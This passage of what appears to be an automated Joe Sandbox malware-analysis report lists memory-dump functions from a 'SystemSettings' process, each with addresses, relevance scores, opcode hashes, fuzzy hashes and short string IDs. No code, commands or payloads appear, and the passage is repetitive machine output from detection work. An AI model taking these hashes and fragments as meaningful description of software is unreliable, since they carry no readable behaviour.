                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f51000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 395c36017857d5c67762ab51698be36c77681ec197be9d7e0c652805ffdc24d9
                                                                  • Instruction ID: c9df1cc871401263db8b671480a7aa98828ddc858479813febaa36bf89a52b07
                                                                  • Opcode Fuzzy Hash: 395c36017857d5c67762ab51698be36c77681ec197be9d7e0c652805ffdc24d9
                                                                  • Instruction Fuzzy Hash: EBE01A3194E7C08FC70B973588698507F60DE2721074A44EEC185CF1A3DA198849C701
                                                                  Function 00007FF848F357D0 Relevance: .0, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f30000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 14195d2c5980b887b5ff0d3b956cfa2a041c56c9688d5c21dad3e9de5793f117
                                                                  • Instruction ID: 1bb5b39332109843423f0a1468bc0b9f629521da5a4086f057e8b523242caab6
                                                                  • Opcode Fuzzy Hash: 14195d2c5980b887b5ff0d3b956cfa2a041c56c9688d5c21dad3e9de5793f117
                                                                  • Instruction Fuzzy Hash: C3D0C930A649084F8B4CB72C889996472D1EB6D216B9540A9D00AC72A1EA6AE889C741
                                                                  Function 00007FF848F523C0 Relevance: .0, Instructions: 18COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f51000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                  • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                  • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                  • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                  Function 00007FF848F5B890 Relevance: .0, Instructions: 17COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f51000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0382474be2252812ffddbfc94a16e0f37ee67439e0a9c7c8d7487183ef8c9765
                                                                  • Instruction ID: 5247c4fdf6c0c826e2f7bf4434eaeaa0ffef6e36569f441342f6b298eb676434
                                                                  • Opcode Fuzzy Hash: 0382474be2252812ffddbfc94a16e0f37ee67439e0a9c7c8d7487183ef8c9765
                                                                  • Instruction Fuzzy Hash: 29D01234B659044FCB0CBB3888598747391EB6A216B9540B9D00BC72B2DA6ADC89C741
                                                                  Function 00007FF848F56F70 Relevance: .0, Instructions: 17COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f51000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cafd7b5e3ac81762a707ba99b176ee0fab41c2c9d3fb29d38313d5a8f2fc29b3
                                                                  • Instruction ID: fe0ba6b06ba2acf9f48637e8285095f17b0ed6dfac4f70930b7f3cbdacc3bde4
                                                                  • Opcode Fuzzy Hash: cafd7b5e3ac81762a707ba99b176ee0fab41c2c9d3fb29d38313d5a8f2fc29b3
                                                                  • Instruction Fuzzy Hash: F6D01234B54D044FC70CB73CC8598747391EB6A216BD540A9D00AC72B2DA6ADC89C741
                                                                  Function 00007FF848F34244 Relevance: .0, Instructions: 14COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f30000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 13e7fffa0f1deb8b49041bd897231f74ad5928ab6a551b9bf339bd8653c2c2ae
                                                                  • Instruction ID: 4fc52dd6f1bdb103e6d478017b9f49b173b816b418fc4fa9a5e29d610eeb2630
                                                                  • Opcode Fuzzy Hash: 13e7fffa0f1deb8b49041bd897231f74ad5928ab6a551b9bf339bd8653c2c2ae
                                                                  • Instruction Fuzzy Hash: 62D01270D0E64F9EE745AB64C4522BEBEB0EF10384F400076D109922D3DE3C25418B88
                                                                  Function 00007FF848F206A5 Relevance: .0, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f20000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 53971b2b7a1ccf372673725fb3507a6dec60887fbbe3a948b12780484fbb2f21
                                                                  • Instruction ID: 7b6de91a4ad0a58b62b15505831059e939ba8390a7cc6308592e73ccdb3e3da7
                                                                  • Opcode Fuzzy Hash: 53971b2b7a1ccf372673725fb3507a6dec60887fbbe3a948b12780484fbb2f21
                                                                  • Instruction Fuzzy Hash: AEC04C26D5F51B59F415B36E74460ADB9406BD5790FD50172DD0D405C1AE4F20D5029E
                                                                  Function 00007FF848F212B0 Relevance: .0, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f20000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 85e310c31d9c320a6a6d98d9c2204c04a471e198612afe6b49aad868d401953c
                                                                  • Instruction ID: 113e2643307379907782fd90d788077e2b902a7d0610b81c7d7edf45b456fd57
                                                                  • Opcode Fuzzy Hash: 85e310c31d9c320a6a6d98d9c2204c04a471e198612afe6b49aad868d401953c
                                                                  • Instruction Fuzzy Hash: 71C04C345558098FC948FB29D88591477A0FB19215BD60090E409CB1B1D65ADCD5C745
                                                                  Function 00007FF848F20B18 Relevance: .0, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f20000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0e13373b9b58342ce0a6d250e1279e2ab542b43c18f7d8366746ebde3e909453
                                                                  • Instruction ID: 9949d6ecbbfdb685cf99504ec335c7d90d2898a58c5e8b0c8d697910e07bfc36
                                                                  • Opcode Fuzzy Hash: 0e13373b9b58342ce0a6d250e1279e2ab542b43c18f7d8366746ebde3e909453
                                                                  • Instruction Fuzzy Hash: FDC08C304108088FC900F72CC89480072A0FB0D210BD10090E00DCB2B0E31A9C80C700
                                                                  Function 00007FF848F25E65 Relevance: .0, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f20000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7b1f7da6fb2832f23699d50f4521dd5bb38492a71b7b1f93fb2c059ccc9fb5ac
                                                                  • Instruction ID: 4d1b3c4f3327df99fd71d0c906149f64c7361066b798d8c05a1bb828c2890f0a
                                                                  • Opcode Fuzzy Hash: 7b1f7da6fb2832f23699d50f4521dd5bb38492a71b7b1f93fb2c059ccc9fb5ac
                                                                  • Instruction Fuzzy Hash: 58C04C22E1BC2A96F266631454212BE4C579F84748F941075E50E973CACF4D6F41428F
                                                                  Function 00007FF848F206C8 Relevance: .0, Instructions: 8COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f20000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6eba791d88507fcd9b52fcee0306e07b664c1240055e9c8e5b93111289e53873
                                                                  • Instruction ID: b1a946f32eae564092c0f3c60d0834f421d52b35b87ca455c30be94ef4ed59ee
                                                                  • Opcode Fuzzy Hash: 6eba791d88507fcd9b52fcee0306e07b664c1240055e9c8e5b93111289e53873
                                                                  • Instruction Fuzzy Hash: 99B00215C6E44F45E454337A294616574506B85254FD51170DC0D505C5994F15D5139A

                                                                  Executed Functions

                                                                  Function 00007FF848F40EF0 Relevance: 2.7, Strings: 1, Instructions: 1493COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f40000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 3<L_^
                                                                  • API String ID: 0-3686210501
                                                                  • Opcode ID: ce02d7f7ef16158158ff2011aa47d3ad6c75b36ef0012a1d7f3054521b50d38c
                                                                  • Instruction ID: 18a819f1451d758a301a948b4b3f7a4f76faa42f71c67fa807a468129350c233
                                                                  • Opcode Fuzzy Hash: ce02d7f7ef16158158ff2011aa47d3ad6c75b36ef0012a1d7f3054521b50d38c
                                                                  • Instruction Fuzzy Hash: 26A29331E1C91A8FEA99FB2884556B573A2FFA4750F1441BAD40DD32C7DF38AC828785
                                                                  Function 00007FF848F30D4C Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f30000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 5Y_H
                                                                  • API String ID: 0-3237497481
                                                                  • Opcode ID: 8aae046bcdd71476b09f9672db11e0176d0422385eba0e4c32d13a8b67c28ff5
                                                                  • Instruction ID: 47bfb219ab36bea2e7b1c6a46e2d8b364c78e3821853b2c05e858c2fa0c22786
                                                                  • Opcode Fuzzy Hash: 8aae046bcdd71476b09f9672db11e0176d0422385eba0e4c32d13a8b67c28ff5
                                                                  • Instruction Fuzzy Hash: A791DD71A1DA998FE789EB28886A7B97FE1FB95354F4001BBD009D72D2CF7A18058710
                                                                  Function 00007FF848F30E43 Relevance: .2, Instructions: 170COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f30000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 651ff4cd7301bc005967b1aa1d7b1903951e22e0127cb8869f30ac817889c4e1
                                                                  • Instruction ID: ce25900b8da3bf235d463862173893d13fd3c4f75f9210777553c49979bb53f3
                                                                  • Opcode Fuzzy Hash: 651ff4cd7301bc005967b1aa1d7b1903951e22e0127cb8869f30ac817889c4e1
                                                                  • Instruction Fuzzy Hash: 1551AF71A19A9D8EE788EB2C84697B97FE1FB95354F4002BBD00AD37D6CF7A14118710
                                                                  Function 00007FF848F30B3F Relevance: 3.8, Strings: 3, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f30000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: c9$!k9$"s9
                                                                  • API String ID: 0-3426396564
                                                                  • Opcode ID: cdf7b1fedab0e168c2ec0b290fe1cc7e2c36fd2936d99a0828d24243f39e5afb
                                                                  • Instruction ID: 386a76b0966d0e40da1e6e04ded984efde0c60a5b7caa05744b9f1ec4f4d1ef4
                                                                  • Opcode Fuzzy Hash: cdf7b1fedab0e168c2ec0b290fe1cc7e2c36fd2936d99a0828d24243f39e5afb
                                                                  • Instruction Fuzzy Hash: 0F01263771E94E4BD7417B3DF8904E8B740EA97236B9503F7D444C7192E642144A83D0
                                                                  Function 00007FF848F63A9D Relevance: 2.7, Strings: 2, Instructions: 235COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f61000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @aH$M
                                                                  • API String ID: 0-2096102131
                                                                  • Opcode ID: 58e5b42ce5a0799ec7c01c28ed0857644771a5d9a089987def0b683ea1969bca
                                                                  • Instruction ID: 0e5839474101cbdde6e37933687b53ea7331f7f71bf80ddfdc7435a8b5a75d3d
                                                                  • Opcode Fuzzy Hash: 58e5b42ce5a0799ec7c01c28ed0857644771a5d9a089987def0b683ea1969bca
                                                                  • Instruction Fuzzy Hash: 0271BE32E0D99A9FE698BB2C84662B4A7D1FF55390F4812B9C40DD71C3DE2C6C878349
                                                                  Function 00007FF848F62268 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f61000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: b545757dfe61d8dbff3d709285017c5389a8cdd8688645e9050446f93ae91f0a
                                                                  • Instruction ID: 4a524386ad849876ab5fcf95d7da1f76272cbe613d6a590d00c8d9b84a3a7146
                                                                  • Opcode Fuzzy Hash: b545757dfe61d8dbff3d709285017c5389a8cdd8688645e9050446f93ae91f0a
                                                                  • Instruction Fuzzy Hash: 3C11BF2184F3C14FEB07A73448299A57FA0AF53355B0D82EED0D6CF4E3DA29584AC712
                                                                  Function 00007FF848F6A569 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f61000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: 56fbc6fc97b1bcecf08acc8d6eed9abf6990e403b9c33b92d371ff91cd345452
                                                                  • Instruction ID: ae2d6ea23a34f07a518a881af88f1ab7ddf4dc904f5a6174b77cd3a08b0894cc
                                                                  • Opcode Fuzzy Hash: 56fbc6fc97b1bcecf08acc8d6eed9abf6990e403b9c33b92d371ff91cd345452
                                                                  • Instruction Fuzzy Hash: 32E06571A0E7844FD719EA3444594547F60EF6720174952EEC046CB1A3EA1DDC86C701
                                                                  Function 00007FF848F63609 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f61000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: f10865428145077676a45b74ea5f0ead43a67f61ed297e9f86b39a68d685ba52
                                                                  • Instruction ID: b1238a6f2d8d5765e86713de2fcdaf411f425ffafddb837c792f56944be9703a
                                                                  • Opcode Fuzzy Hash: f10865428145077676a45b74ea5f0ead43a67f61ed297e9f86b39a68d685ba52
                                                                  • Instruction Fuzzy Hash: 86F0A02050E7C44FC706AB388829455BFA0EE6720074A52EEC045CF1A3EA298886C701
                                                                  Function 00007FF848F62319 Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f61000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: 085713bfedbf6abb70d479466468059670f95413270aa140e942f627365aad51
                                                                  • Instruction ID: 716b02703acb82ec155c38c843cea04be91fb7fee3e6fb5335c17d0ed5347562
                                                                  • Opcode Fuzzy Hash: 085713bfedbf6abb70d479466468059670f95413270aa140e942f627365aad51
                                                                  • Instruction Fuzzy Hash: EEF0657190E3C44FC716E7744869455BFA0EF6721174951EEC486CF1A7EA2D9885C701
                                                                  Function 00007FF848F6A5F9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f61000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: fd628c14d0a6d327f224e11269401f3bc157ea228b4a9bbcf55f9aa88b88c369
                                                                  • Instruction ID: b53dba1cde5c11323ebfb1b29abc625a7f63ffb2d7476b9cbbe3042c47b5400b
                                                                  • Opcode Fuzzy Hash: fd628c14d0a6d327f224e11269401f3bc157ea228b4a9bbcf55f9aa88b88c369
                                                                  • Instruction Fuzzy Hash: B2E06D71A0E7C44FC71AAB34886D454BFA0EF6721174A52EFC045CF1A7EA2D8889C702
                                                                  Function 00007FF848F6AB39 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f61000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: I
                                                                  • API String ID: 0-3707901625
                                                                  • Opcode ID: c2b03b3c7214bbb85c78b4e4e6b08611e86646ba3f54fb9bb01ff187a7e4516c
                                                                  • Instruction ID: 1f86975cbf049c1593bf7bac15fa509cd99c588d209dde6422105e48f4985f2d
                                                                  • Opcode Fuzzy Hash: c2b03b3c7214bbb85c78b4e4e6b08611e86646ba3f54fb9bb01ff187a7e4516c
                                                                  • Instruction Fuzzy Hash: 09E0127144E7C04FDB49EB3484658547F60EE6721178A41EEC045CB1B3E61DD84AC701
                                                                  Function 00007FF848F623A9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f61000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: I
                                                                  • API String ID: 0-3707901625
                                                                  • Opcode ID: 2a421c1fa75d6f069513473085aa75eddd319fa91f61dd09c93569bc9381ab77
                                                                  • Instruction ID: 60518a5d8b6f89b77563a58f2784de2c3ecca262f3aadca85dfd2d445370c3c4
                                                                  • Opcode Fuzzy Hash: 2a421c1fa75d6f069513473085aa75eddd319fa91f61dd09c93569bc9381ab77
                                                                  • Instruction Fuzzy Hash: 27E0ED7144E7D08FC70AEB7488658547F60EE6721174A51DED045CF1B3E6299849C701
                                                                  Function 00007FF848F67E49 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f61000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: I
                                                                  • API String ID: 0-3707901625
                                                                  • Opcode ID: a1078724cb384243e897ce26806092ae8e723e60f61d7a6d6b93ad97787d26af
                                                                  • Instruction ID: ee85b32d742a3a1329847b303f4fa174bfe311db8b7f05c6220b239a2759e865
                                                                  • Opcode Fuzzy Hash: a1078724cb384243e897ce26806092ae8e723e60f61d7a6d6b93ad97787d26af
                                                                  • Instruction Fuzzy Hash: 2AE0ED6184E7C44FD706EB74887A9557FA09E6721074A41EEC085CF1A3E62E9849C701
                                                                  Function 00007FF848F414FD Relevance: .4, Instructions: 445COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f40000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d95d4e37183d47f96bb40dff72ef103e574a9e130d2b912a0eedbc11d31df0a5
                                                                  • Instruction ID: 781a851a006477aa0c21cbdc461ae53868bde39d58cc062566518dc46e35ea1b
                                                                  • Opcode Fuzzy Hash: d95d4e37183d47f96bb40dff72ef103e574a9e130d2b912a0eedbc11d31df0a5
                                                                  • Instruction Fuzzy Hash: F5E1A431E1C92A8FE758FB2894556B577A1FFA8740F1401BAD40DD32C7DF28AD828785
                                                                  Function 00007FF848F69078 Relevance: .1, Instructions: 138COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f61000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e73a237150e1869eea50b47846cce731abbce61a1fe0cd0bba6aea73d60a8ab7
                                                                  • Instruction ID: 38b4964b11bfbd1ac087d49f39d32c98ac57c1d245ff9d435db2a82b7cdf42a8
                                                                  • Opcode Fuzzy Hash: e73a237150e1869eea50b47846cce731abbce61a1fe0cd0bba6aea73d60a8ab7
                                                                  • Instruction Fuzzy Hash: C2410233E2E152AEE751BBBCB4420E93760EF403A4F084376D14C9F497DF1C244A86A8
                                                                  Function 00007FF848F63BEF Relevance: .1, Instructions: 133COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f61000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 06c5c717ef2a795bde3d62bddad6c8e059a77928a8d02c895a7707477af3caf2
                                                                  • Instruction ID: 063426732fd5da27e8d11b9fed5d4c3b3ad0ed997f868832f9c6d94c1a29224c
                                                                  • Opcode Fuzzy Hash: 06c5c717ef2a795bde3d62bddad6c8e059a77928a8d02c895a7707477af3caf2
                                                                  • Instruction Fuzzy Hash: 9A41BD31A1D95A5FE688FB2C84622B9B3D2EF98380F044279D40DC32C3DE2D6D838795
                                                                  Function 00007FF848F63BC6 Relevance: .1, Instructions: 132COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f61000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 42b87fb063f2bc45d7841147216e943e91e2bdafaaa5971ec509ea3bc2d4a703
                                                                  • Instruction ID: 4e73354acf09ac28f37b2bcd7d72dcc7ac9e68adfdcd7f1e19bd6070dd89428b
                                                                  • Opcode Fuzzy Hash: 42b87fb063f2bc45d7841147216e943e91e2bdafaaa5971ec509ea3bc2d4a703
                                                                  • Instruction Fuzzy Hash: 6141AC31A1C95A5EEA88FB2C84626B9A3D1EF99380F441279D40DD32C3DE2D69838359
                                                                  Function 00007FF848F308D0 Relevance: .1, Instructions: 131COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f30000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fc4e02f4cdc06ffb7d9ca3a73a3907a4eabf696350473caaee82f6bd06cca35d
                                                                  • Instruction ID: 4487b68ab1d03740006db74f34fcd683f8c6f8fad639ff57246f24e6e6154aef
                                                                  • Opcode Fuzzy Hash: fc4e02f4cdc06ffb7d9ca3a73a3907a4eabf696350473caaee82f6bd06cca35d
                                                                  • Instruction Fuzzy Hash: 35413822A1E9599EE344B77C60892FE7790EF853A8F0806BBD44DCB1D7DF1C68418298
                                                                  Function 00007FF848F31171 Relevance: .1, Instructions: 98COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f30000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f04a3a9aaab5897e0d3df3ef29cec71bdf55dc72cd84540cf5cd5e3c4dead341
                                                                  • Instruction ID: 12f6c275ff37ceeeb5a1643842fb1128a7c258f7cd1e84bd78651dcc6fdda9bb
